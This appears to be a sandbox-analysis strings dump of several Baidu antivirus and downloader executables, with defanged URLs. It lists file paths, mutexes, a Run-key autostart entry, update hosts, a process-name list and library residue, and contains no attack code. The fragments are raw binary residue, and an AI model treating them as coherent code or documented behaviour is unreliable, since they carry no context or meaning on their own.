"%s\BaiduSdSvc.exe" -r
%Program Files% (x86)\Baidu
%Program Files%\Baidu
D:\Program Files (x86)\Baidu
D:\Program Files\Baidu
E:\Program Files (x86)\Baidu
E:\Program Files\Baidu
F:\Program Files (x86)\Baidu
F:\Program Files\Baidu
BaiduAnSvc.exe
"%s\BaiduAnSvc.exe" -r
BDMReport.dll
%s\baidu\baiduan\Config\8001.dat
BaiduAnTray.exe
%s\BaiduHips.exe
BaiduProtect.exe
"%s\BaiduProtect.exe" -r
%Program Files% (x86)\Common Files\Baidu
%Program Files%\Common Files\Baidu
D:\Program Files (x86)\Common Files\Baidu
D:\Program Files\Common Files\Baidu
E:\Program Files (x86)\Common Files\Baidu
E:\Program Files\Common Files\Baidu
F:\Program Files (x86)\Common Files\Baidu
F:\Program Files\Common Files\Baidu
%s\baidu\baidusd\Config\900.dat
\\.\BDMWrench
Global\BDDefenseDriver{80438582-0F66-44E0-3D2B-2D7E872CBFBB}
CD61BB3A-403D-7650-5D9A-4E57EA1035E6
UDP-ADM_KITUTL_PH_SET_INVALID
UDP-ADM_WMWCH_PH_SET_INVALID
UDP-ADM_ST_ID:%d
UDP-ADM_DRVE_RUN
UDP-ADM_CLIENT_RUN
UDP-ADM_CPY_SYS_FID
UDP-ADM_OPEN_SYS_FID
UDP-ADM_INST_SYS_FID
UDP-ADM_SED_PAVER_FID
UDP-ADM_ATR_SET
UDP-ADM_SED_ATR_FID
UDP-ADM_SED_FSD
UDP-ADM_RPT_FID
UDP-ADM_FSD
\BaiduSdSvc.exe
\BaiduAnSvc.exe
UDP-ADM_RPT_INIT_FID
\system32\drivers\BDMWrench.sys
drivers\BDMWrench.sys
UDP-EVT_WFR
UDP-EVT_WFID
UDP-ADM_SED_PAVER2_FID
\BaiduSdTray.exe" -stmd=3
\BaiduAnTray.exe" -stmd=3
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
xx
C9521EC1-6642-5CF6-8FB9-DE04639593BD
UDP-PS_KITUTI_PH_SET_INVALID
UDP-PS_LD_FID
UDP-PL_SRV_ID:%d
UDP-PL_SRV_RUN
UDP-PL_SRV_INSTPH_FID
UDP-PL_SRV_CK_REG_DAMG
UDP-PL_SRV_REPT01_FID
UDP-PL_SRV_REGREPIR_FID
UDP-PL_SRV_PL_FID
UDP-PL_SRV_REPT02_FID
UDP-PL_SRV_FSD
UDP-PL_TRY_ID:%d
UDP-PL_TRY_RUN
UDP-PL_TRY_INSTPH_FID
UDP-PL_TRY_UN_ATRUN
UDP-PL_TRY_REPT01_FID
UDP-PL_TRY_PL_FID
UDP-PL_TRY_REPT02_FID
UDP-PL_TRY_FSD
UDP-PL_RPT_INIT_FID
UDP-ADM_SET_KITU
UDP-ADM_SET_MWR_PATH
UDP-ADM_OS_ERR
UDP-ADM_PROC_DIR_UN_EXIST
UDP-ADM_PROC_GT_VER_FID
UDP-ADM_PROC_MATCH_FID
\BDConfig.dll
hh_debug:%s
BaiduSdUpdate.exe
Wtsapi32.dll
\BaiduAn.exe
\BDKVRecomm.dll
BDMgr.exe -stmd=6
BDMgr.exe -stmd=7
TrayPluginContainerConfig.xml
BDMgr.exe -stmd=7 -selplugin={914438D6-1EC4-434A-B6EC-20F84894C395}
hXXp://anquan.baidu.com/bbs/forum.php?mod=post&action=newthread&fid=40
{E059A29F-D2ED-4f28-849A-851AA9D5A05C}
C:\test.txt
BarServer.exe|BarMonitor.exe|BarServerView.exe|BMServerManager.exe|BarClient.exe|BarClientView.exe|PersonUDisk.exe|BarClientSafeCenter.exe|EGUpgrader.exe|eyvncnbsvr.exe|EGVirtualDisk.exe|EGVncService.exe|EyooNetS.exe|Enjoytray.exe|EntDesktop.exe|eyuscore|eyoorun.exe|grb.exe|irsetup.exe|Gptsvr.exe|HINTAMPROXY.exe|HintClient.exe|HintBackup.exe|wxServer.exe|wxSysTray.exe|wxServerView.exe|clsmn.exe|DFServ.exe|FrzState2k.exe|PubwinCore.exe|PubwinPool.exe|Pubwin2007.exe|Pubwin2009.exe|xsMenu.exe|
OUTLOOK.EXE|RTX.exe|Foxmail.exe|OfficeTask.exe|OfficeIm.exe|OfficeMail.exe|OfficeDaemon.exe|OfficeIndex.exe|OfficePOP3.exe|
iNode Client.exe|8021x.exe|DrClient.exe|DrUpdate.exe|DrMain.exe|
ic_danger.png
BaiduSdBugRpt.exe
BaiduSd.exe
Client.exe
\GameNoDisturb.ini
\PullUpConfig.xml
file='skin_1.png' xtiled='true' ytiled='true'
\BaiduSdSvc.exe -m "
\cmd.exe
Shell32.dll
\BaiduSd.exe
-selplugin=rdp_scan -vll=%s
BaiduSd{D8A4131D-3A7A-48a1-B080-28E1DC04F7C2}
100012_1
CheckIco_Select_hor.png
CheckIco.png
ic_menu_logo_hor.png
CheckIco_hor.png
CheckIco_Select.png
MainIco_hor.png
ic_menu_logo.png
MainIco.png
menu.xml
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduSd
2.1.0.3086
hXXp://anquan.baidu.com/shadu
hXXp://shadu.baidu.com/privacy.html
about.xml
@advapi32.dll
JoinBaiduCloundPlan
SWITCH_CENTER_URLSAFE
000%x
\StringFileInfo\%s\FileVersion
ABDKVMainframe.dll
BDCooly.dll
A\\.\pipe\{5EA6312A-0014-4160-AF85-E26361D6281E}
\StringFileInfo\xx\FileVersion
\kernel32.dll
Windows 8.1
Windows 8.0
Windows 7
Windows Vista
Windows 7
Windows Vista
Windows Server 2003,
Windows XP
Windows 2000
Windows NT
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
Windows 95
Windows 98
Windows ME
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
okernel32.dll
HKEY_USERS
Software\Microsoft\Windows NT\CurrentVersion\Time Zones\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
Software\Microsoft\Windows NT\CurrentVersion\Print\
Software\Microsoft\Windows NT\CurrentVersion\Ports\
Software\Microsoft\Windows NT\CurrentVersion\Perflib\
Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Software\Microsoft\Windows NT\CurrentVersion\Language Pack\
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\
Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\
Software\Microsoft\Windows NT\CurrentVersion\Fonts\
Software\Microsoft\Windows NT\CurrentVersion\FontMapper\
Software\Microsoft\Windows NT\CurrentVersion\FontLink\
Software\Microsoft\Windows NT\CurrentVersion\FontDpi\
Software\Microsoft\Windows NT\CurrentVersion\Console\
Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\
Software\Microsoft\Windows\CurrentVersion\Setup\
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\
Software\Microsoft\Windows\CurrentVersion\Policies\
Software\Microsoft\Windows\CurrentVersion\Group Policy\
Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\
Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\
Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\
Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\
Software\Microsoft\Windows\CurrentVersion\App Paths\
Software\Microsoft\SystemCertificates\
Software\Microsoft\EnterpriseCertificates\
system32\winlogon.exe
GWintrust.dll
Crypt32.dll
6BE417DD-264A-4678-A036-74D2173ECCEB
d-d-d
D823ABCA-A92F-429d-9E11-3779B5F682AA
BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}
BDMUpdate.dll
B.bdtmp
.old_
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0
\Global.db
Ciphlpapi.dll
C\\.\PhysicalDrive%d
\\.\Scsi%d:
0123456789
BaidusdTray.exe

bddownloader.exe_3300:

.text
`.rdata
@.data
.rsrc
8%uvP
;*u.SUj
PSSSSSSh
>.uTV
j SSSSSSSh
aSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
YYtCP
asio.ssl
asio.misc
D:\dl\boost_1_44_0_build\include\boost/exception/detail/exception_ptr.hpp
asio.misc error
asio.ssl error
dtrp.download.iyuntian.com
res.download.iyuntian.com
tk.download.iyuntian.com
utk.download.iyuntian.com
thread.exit_event
thread.entry_event
%s\Connection
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
VVV.baidu.com.cn
HTTP/1.1
$MD5Version: 1.0.0 November-19-1997 $
$Id: md5.c,v 1.1.1.1 2004/05/17 13:23:36 rcrittenden0569 Exp $
</%s>
<!--%s-->
standalone="%s"
encoding="%s"
version="%s"
&#xX;
%s='%s'
%s="%s"
PKEY_CUSTOMNAME
PKEY_PRODUCTNAME
PKEY_ISSHOW
PKEY_EXITTIME
PKEY_CUSTOMID
PKEY_START_STATUS
PKEY_GUID
PKEY_MINORVERSION
PKEY_MAJORVERSION
PKEY_COREVERSION
PKEY_EXEVERSION
PKEY_UPDATESERVERPORT
PKEY_UPDATESERVERIP
PKEY_PSHASH
PKEY_PSNAME
PKEY_EXHASH
PKEY_EXNAME
PKEY_TNHASH
PKEY_TNNAME
PKEY_COREHASH
PKEY_CORENAME
PKEY_EXEHASH
PKEY_EXENAME
PKEY_UPDATEURL
PKEY_FILENAME
PKEY_RESULT
up.download.iyuntian.com
PKEY_TTL
PKEY_ISFIX
PKEY_VERSION
PKEY_FILEEMULE_HASH
PKEY_FILEEMULE_SIZE
PKEY_FILEEMULE_NAME
PKEY_FILEBT_HASH
PKEY_FILEBT_SIZE
PKEY_FILEBT_NAME
PKEY_FILECORE_HASH
PKEY_FILECORE_SIZE
PKEY_FILECORE_NAME
PKEY_URL
PKEY_PERIOD
kernel32.dll
.mixcrt
KERNEL32.DLL
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
GetProcessWindowStation
USER32.DLL
operator
portuguese-brazilian
FhModule = %u, pfunc = %u
DbgHelp.dll
crash.dmp
0xX
DlBugReport.ini
DlBugReport.dat
%Y-%m-%d %H:%M:%S
%d.%d.%d.%d
,d-d-d d:d:d
[ 0xX ] %s [%s]
Error: Write address 0xX
Error: Read address 0xX
version = %s
%s-----------------------------------
Type: %s
Address: 0xX
bddownloader.exe
EXCEPTION_FLT_INVALID_OPERATION
EXCEPTION_FLT_DENORMAL_OPERAND
(%d,%d,%d,%d)
0xX<unknown module>:
%s::x;
0xX[%X] %s:
%s::x
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
d:\dl\DownloadProxy_proj\Output\Release\bddownloader.pdb
GetProcessHeap
CreateIoCompletionPort
GetCPInfo
GetConsoleOutputCP
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyW
RegOpenKeyExA
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
WS2_32.dll
VERSION.dll
NetWkstaTransportEnum
NETAPI32.dll
PSAPI.DLL
imagehlp.dll
zcÁ
'DownloadProxy.EXE'
BDDownloadProxy.Downloader.1 = s 'Downloader Class'
CLSID = s '{91B5E4DE-4C97-41CD-9F94-84BFAABB7371}'
BDDownloadProxy.Downloader = s 'Downloader Class'
CurVer = s 'BDDownloadProxy.Downloader.1'
ForceRemove {91B5E4DE-4C97-41CD-9F94-84BFAABB7371} = s 'Downloader Class'
ProgID = s 'BDDownloadProxy.Downloader.1'
VersionIndependentProgID = s 'BDDownloadProxy.Downloader'
'TypeLib' = s '{DA624F8F-98BF-4B03-AD11-A12D07119E81}'
stdole2.tlbWWW
cuiMsgTypeWWW
pMsgParamWWWd
6|pTaskUrl
Created by MIDL version 6.00.0366 at Thu May 22 14:49:00 2014
&UU*&&&&&&&&*UU(%%%%%%%%(UU)%%%%%%%%)UU.$$$$$$$$.UU1''''''''1UU
"7,,11,,7"
2222222222222222
11///20.
##!!! !!!##
.02///11
mM............................................................Mm
mM..........................................Mm
(((((((JgT..TgJ(((((((
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
bdpunchproxy.dll
bddownload_config.xml
dl.dll
\bddownloader.exe
{51BEE30D-EEC8-4BA3-930B-298B8E759EB1}
CLSID\%s\LocalServer32
{%X-%X-%X-%X-%X%X}
B.tlb
Mscoree.dll
BDDownloadProxy.Downloader.1
\Installlog.txt
\bdcomproxy.dll
\7z.dll
\bdpunchproxy.dll
\dl.dll
regsvr32.exe
Kernel32.dll
7z.dll
C\StringFileInfo\xx\
netsh.exe
\\.\PhysicalDrive%d
\\.\Scsi%d:
oiphlpapi.dll
\Global.db
PBDD_Temp_Exe
%*.*f
: %s/s
%s: %s
\TDConfig.ini
H\set.log
%Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe
(1-10240)
1.0.108.0

BaiduHips.exe_3260:

.text
`.rdata
@.data
.rsrc
c:\clientci\workspace\hips_v1.1_fix_compile\basic\Output\release\BaiduHips.pdb
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
KERNEL32.dll
USER32.dll
MSVCP80.dll
_amsg_exit
_wcmdln
MSVCR80.dll
_crt_debugger_hook
VERSION.dll
<assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
@BaiduHips.exe
%d.%d.%d.%d
BaiduHipsIU.dll
BaiduHipsCore.dll
1.1.0.733
BaiduHips.exe

BaiduAnSvc.exe_3664:

.text
`.rdata
@.data
.rsrc
@.reloc
..\src\google\protobuf\message_lite.cc
CHECK failed: !coded_out.HadError():
%d.%d.%d
libprotobuf %s %s:%d] %s
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\io\coded_stream.cc
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
inflate 1.2.5 Copyright 1995-2010 Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
1.0.1.1
%d.%d
d-d-d d:d:d
RegKey
CryptMsgGetParam
CryptMsgClose
CertFindCertificateInStore
CertFreeCertificateContext
CertCloseStore
CertGetNameStringW
CryptCATCatalogInfoFromContext
RootKey
SubKey
IsNative64Key
Content-Length:%d
s.x.baidu.com
c:\clientci\workspace\bdm_v3.0_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
.\update.pb.cc
%s:%u
%u.%u.%u.%u
addr %s not good...
Unsupported Media Type
HTTP Version not supported
HTTP/1.0
HTTP/1.1
1.0.0.1
.\header.pb.cc
https
ftpes
ftps
tftp
% ;?:@=&,$/-_!.~*()
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
&#xX;
</%s>
%s="%s"
%s='%s'
<!--%s-->
<![CDATA[%s]]>
version="%s"
encoding="%s"
standalone="%s"
c:\clientci\workspace\bdm_v3.0_fix_compile\basic\Output\BinRelease\BaiduAnSvc.pdb
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ
BDMFrameWork.dll
SHDeleteKeyW
SHLWAPI.dll
BDMSkin.dll
GetProcessHeap
GetWindowsDirectoryW
GetSystemWindowsDirectoryW
KERNEL32.dll
USER32.dll
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegSetKeySecurity
RegFlushKey
RegNotifyChangeKeyValue
RegGetKeySecurity
RegDeleteKeyW
ADVAPI32.dll
ShellExecuteExW
ShellExecuteW
SHFileOperationW
SHELL32.dll
ole32.dll
MSVCP80.dll
PSAPI.DLL
WS2_32.dll
MSVCR80.dll
_amsg_exit
_crt_debugger_hook
USERENV.dll
WTSAPI32.dll
imagehlp.dll
InternetCrackUrlW
HttpOpenRequestW
HttpQueryInfoW
HttpSendRequestW
WININET.dll
NETAPI32.dll
RegOpenKeyExA
BaiduAnSvc.exe
.?AV?$CSingleton@VCRtpPluginContainer@@@BDMBase@@
.?AVCRtpPluginContainer@@
.?AV?$CSingleton@VCRTPServer@@@utils@@
.?AVCRTPServer@@
.?AVCBDMOptionsReportRecord@@
.?AVCBDMLauchReportRecord@@
.?AVTSMsg@@
.?AVIBDMMsg@@
.?AVTSMsgMap@@
.?AVITSMsgMap@@
.?AVTSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVTSMsgStub@@
.?AVITSMsgStub@@
.?AVCCmdPluginLauncher@@
.?AVCExePluginLauncher@@
.?AVIPluginCmdExecutor@@
.?AUPluginInfoPassiveSaver@@
.?AVheader@http@bena@@
.?AVresponse@http@bena@@
.?AVrequest@http@bena@@
ÿF=
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>
6%7s7
00
7!8(868/:
< <$<(<,<0<4<8<<<|<
?&???[?{?
3<3r3
2 2$2(2,20242
; ;$;(;,;0;4;
HKEY_LOCAL_MACHINE\Software
HKEY_CURRENT_USER\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\DirectShow
HKEY_CURRENT_USER\Software\Classes\Interface
HKEY_CURRENT_USER\Software\Classes\Media Type
HKEY_CURRENT_USER\Software\Classes\MediaFoundation
HKEY_CLASSES_ROOT\CLSID
HKEY_CLASSES_ROOT\DirectShow
HKEY_CLASSES_ROOT\Interface
HKEY_CLASSES_ROOT\Media Type
HKEY_CLASSES_ROOT\MediaFoundation
HKEY_LOCAL_MACHINE\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSID
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShow
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Interface
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media Type
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundation
HKEY_CLASSES_ROOT\Wow6432Node\CLSID
HKEY_CLASSES_ROOT\Wow6432Node\DirectShow
HKEY_CLASSES_ROOT\Wow6432Node\Interface
HKEY_CLASSES_ROOT\Wow6432Node\Media Type
HKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation
ntdll.dll
EXPLORER.EXE
explorer.exe
baiduanTray.exe
"%s" -stmd=12
winlogon.exe
SOFTWARE\Microsoft\Windows\CurrentVersion
BaiduAnTray.exe
"{0}\{1}" {2}
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
BaiduAn.exe
BaiduAnUpdate.exe
BaiduAnBugRpt.exe
Global\BDMMutex{B2F10594-7119-4649-9326-AF1890C5CE56}
BDAFileHelper.exe
Global\BDMEvent{8C345A9A-F601-405d-AB4A-B459CD5E369E}
BDALeakfixer.exe
Global\TBD_SERVICE_{4A9CAFF9-6834-419c-AFB1-139AC49FF55E}
\\.\pipe\{B99F6A00-E6C9-4253-9708-C6EFB939FD53}
BDASoftmgr.exe
BDASWHelper.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduAn
\BDPreL.exe
\RTPPlugins\RtpContainerConfig.xml
C:\test.exe
d-d-d d:d:d d
d:d:d
%s(%d)
Last Error : %u(%s)
Global\BDMMutex{32EB1BC7-A5CD-4356-A6B1-54D7BF690CA7}
Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}
BDMNet.dll
\kernel32.dll
Windows 8.1
Windows 8.0
Windows 7
Windows Vista
Windows 7
Windows Vista
Windows Server 2003,
Windows XP
Windows 2000
Windows NT
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
Windows 95
Windows 98
Windows ME
Kernel32.dll
r.dll
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
okernel32.dll
HKEY_USERS
@Wintrust.dll
Crypt32.dll
xxxxxxxxxxxxxxxx
Software\Microsoft\Windows NT\CurrentVersion\Time Zones\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
Software\Microsoft\Windows NT\CurrentVersion\Print\
Software\Microsoft\Windows NT\CurrentVersion\Ports\
Software\Microsoft\Windows NT\CurrentVersion\Perflib\
Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Software\Microsoft\Windows NT\CurrentVersion\Language Pack\
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\
Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\
Software\Microsoft\Windows NT\CurrentVersion\Fonts\
Software\Microsoft\Windows NT\CurrentVersion\FontMapper\
Software\Microsoft\Windows NT\CurrentVersion\FontLink\
Software\Microsoft\Windows NT\CurrentVersion\FontDpi\
Software\Microsoft\Windows NT\CurrentVersion\Console\
Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\
Software\Microsoft\Windows\CurrentVersion\Setup\
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\
Software\Microsoft\Windows\CurrentVersion\Policies\
Software\Microsoft\Windows\CurrentVersion\Group Policy\
Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\
Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\
Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\
Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\
Software\Microsoft\Windows\CurrentVersion\App Paths\
Software\Microsoft\SystemCertificates\
Software\Microsoft\EnterpriseCertificates\
system32\winlogon.exe
F6BE417DD-264A-4678-A036-74D2173ECCEB
{X-X-X-XX-XXXXXX}
D823ABCA-A92F-429d-9E11-3779B5F682AA
\NotInstalledPlugin.xml
\GlobalPluginInfo.xml
\LocalPluginInfo.xml
\PluginSetup.xml
\HotPlugins.xml
\HotPlugin.bnr
PluginSetup.xml
{E5B65788-3C2C-4F59-92E7-58C9205BC66E}
BUninstalledPlugins.xml
/handle=%d /supplyid=%d /installmode=2 /S /D=%s
BPackCache.xml
BDMDownload.dll
B##cmd:
BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}
BDMUpdate.dll
.bdtmp
.old_
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0
\Global.db
Diphlpapi.dll
D\\.\PhysicalDrive%d
\\.\Scsi%d:
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\
3.0.0.3971
BaiduanSvc.exe

BDASWDeskGuide.exe_228:

.text
`.rdata
@.data
.rsrc
@.reloc
T$.SR
inflate 1.2.5 Copyright 1995-2010 Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
CryptMsgGetParam
CryptMsgClose
CertFindCertificateInStore
CertFreeCertificateContext
CertCloseStore
CertGetNameStringW
CryptCATCatalogInfoFromContext
c:\clientci\workspace\bdm_v3.0_fix_compile\basic\Output\BinRelease\BDASWDeskGuide.pdb
?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ
BDMFrameWork.dll
SHLWAPI.dll
BDMSkin.dll
KERNEL32.dll
EnumWindows
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
ADVAPI32.dll
ole32.dll
MSVCP80.dll
MSVCR80.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
GetProcessHeap
GetWindowsDirectoryW
SHELL32.dll
imagehlp.dll
BDASWDeskGuide.exe
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><asmv3:application>
<asmv3:windowsSettings xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">
</asmv3:windowsSettings>
7,787\7|7
SWDesktopHide.xml
SWDesktopGuideWnd.xml
bg_guide_left.png
bg_guide_right.png
SWDesktopGuide{ACE6587A-7508-4cbe-93BD-A2AAE304F5B5}
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
CommonRes.rdb
file='skin_image16.png' xtiled='true' ytiled='true'
skin_image16.png
file='%s' xtiled='true' ytiled='true'
Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}
@Wintrust.dll
Crypt32.dll
6BE417DD-264A-4678-A036-74D2173ECCEB
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\
3.0.0.3967
SWDesktopGuide.exe

baiduanTray.exe_3012:

.text
`.rdata
@.data
.rsrc
@.reloc
D$<PSSh4
u%SVW
;9u.SWj
8.uwS
n<.ut
;:u.SWj
PSSSSSSh
L$XQSSh
SPSSSSh
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
..\src\google\protobuf\generated_message_reflection.cc
CHECK failed: (from.GetDescriptor()) == (descriptor):
..\src\google\protobuf\message.cc
: Tried to copy from a message with a different type.to:
..\src\google\protobuf\message_lite.cc
CHECK failed: !coded_out.HadError():
..\src\google\protobuf\io\coded_stream.cc
%d.%d.%d
libprotobuf %s %s:%d] %s
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\descriptor.cc
". To use it here, please add the necessary import.
", which is not imported by "
$0$1 = $2
$0$1 $2 $3 = $4
.PLACEHOLDER_VALUE
.placeholder.proto
map key must name a scalar or string field.
map_key must not name a repeated field.
CHECK failed: dynamic.get() != NULL:
.foo = value".
.dummy
FieldDescriptorProto.extendee set for non-extension field.
FieldDescriptorProto.extendee not set for extension field.
Files that do not use optimize_for = LITE_RUNTIME cannot import files which do use this option. This file is not lite, but it imports "
CHECK failed: !out.HadError():
" is repeated. Repeated options are not supported.
Import "
Missing field: FileDescriptorProto.name.
File recursively imports itself:
..\src\google\protobuf\wire_format.cc
..\src\google\protobuf\reflection_ops.cc
..\src\google\protobuf\extension_set.cc
CHECK failed: iter != extensions_.end():
..\src\google\protobuf\extension_set_heavy.cc
\xx
..\src\google\protobuf\stubs\strutil.cc
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
..\src\google\protobuf\descriptor.pb.cc
google/protobuf/descriptor.proto
google/protobuf/descriptor.proto
google.protobuf"G
2$.google.protobuf.FileDescriptorProto"
2 .google.protobuf.DescriptorProto
2$.google.protobuf.EnumDescriptorProto
2'.google.protobuf.ServiceDescriptorProto
2%.google.protobuf.FieldDescriptorProto
.google.protobuf.FileOptions
.google.protobuf.SourceCodeInfo"
2/.google.protobuf.DescriptorProto.ExtensionRange
.google.protobuf.MessageOptions
2 .google.protobuf.FieldDescriptorProto.Label
2*.google.protobuf.FieldDescriptorProto.Type
.google.protobuf.FieldOptions"
2).google.protobuf.EnumValueDescriptorProto
.google.protobuf.EnumOptions"l
2!.google.protobuf.EnumValueOptions"
2&.google.protobuf.MethodDescriptorProto
.google.protobuf.ServiceOptions"
.google.protobuf.MethodOptions"
2).google.protobuf.FileOptions.OptimizeMode:
2$.google.protobuf.UninterpretedOption":
2$.google.protobuf.UninterpretedOption*
2#.google.protobuf.FieldOptions.CType:
experimental_map_key
2$.google.protobuf.UninterpretedOption"/
2-.google.protobuf.UninterpretedOption.NamePart
2(.google.protobuf.SourceCodeInfo.Location
com.google.protobufB
Tokenizer::ParseInteger() passed text that could not have been tokenized as an integer:
..\src\google\protobuf\io\tokenizer.cc
Tokenizer::ParseFloat() passed text that could not have been tokenized as a float:
Tokenizer::ParseStringAppend() passed text that could not have been tokenized as a string:
..\src\google\protobuf\stubs\substitute.cc
..\src\google\protobuf\dynamic_message.cc
..\src\google\protobuf\text_format.cc
..\src\google\protobuf\descriptor_database.cc
Invalid file descriptor data passed to EncodedDescriptorDatabase::Add().
unsupported version
